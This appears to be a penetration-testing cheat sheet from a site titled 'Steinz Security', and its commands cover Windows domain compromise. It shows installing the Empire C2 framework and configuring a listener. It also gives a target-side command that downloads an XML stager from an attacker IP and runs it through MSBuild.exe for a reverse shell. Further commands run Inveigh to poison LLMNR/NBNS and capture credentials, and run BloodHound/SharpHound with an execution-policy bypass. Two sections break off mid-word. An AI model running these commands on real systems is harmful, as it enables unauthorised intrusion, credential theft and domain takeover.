Steinz Security

    https://github.com/BC-SECURITY/Empire/releases #installing Empire apt-get install autoconf tar -xzfv empire.tar.gz cd setup && ./install cd ../ ./empire Reverse Shell to Empire Uselistener http (Empire: listeners/http) > set BindIP 10.10.10.10 (Empire: listeners/http) > set Name 10.10.10.10 (Empire: listeners/http) > set Port 8001 (Empire: listeners/http) > execute   Getting the shell back usestager windows/launcher_xml set Listener http set OutFile /root/a.xml #on the target machine run powershell curl http://10.10.10.12:8002/a.xml -outfile a.xml C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe c:\users\bhanu\a.xml Running Inveigh on Empire Agents Interact [ID] usemodule collection/inveigh (Empire: powershell/collection/inveigh) > set SMB Y (Empire: powershell/collection/inveigh) > set LLMNR Y (Empire: powershell/collection/inveigh) > set NBNS Y (Empire: powershell/collection/inveigh) > set Proxy Y (Empire: powershell/collection/inveig

    BloodHound-Python If you have access to DC, need admin creds - Github Linux: proxychains python3 bloodhound.py -d Steins.local -u admin -p p@$$W0rd! -c all -dc dc.steins.local -gc dc.steins.local -v -ns 10.10.10.10 --dns-tcp Few files will appear in the same location, import them into bloodhound Kali: apt-get install bloodhound sudo neo4j console go to localhost:7474 neo4j: neo4j #login in browser and change the password bloodhound #bloodhoun login will pop-up, login with new creds Windows: Download this on Windows target: SharpHound.ps1 powershell -ep bypass ..\SharpHound.ps1 invoke-Bloodhound -CollectionMethod All -Domain Steins.local -ZipfileName file.zip invoke-Bloodhound -CollectionMethod LoggedOn -Verbose or SharpHound.exe -c All -d Steins.local --zipfilename test.zip OR .\SharpHound.exe -d steins.local --domaincontroller 192.168.168.168 --ldapusername admin --ldappassword P@$$W0rd! --zipfilename domain.zip - c All open the file in bloodhound --> click on upload --&g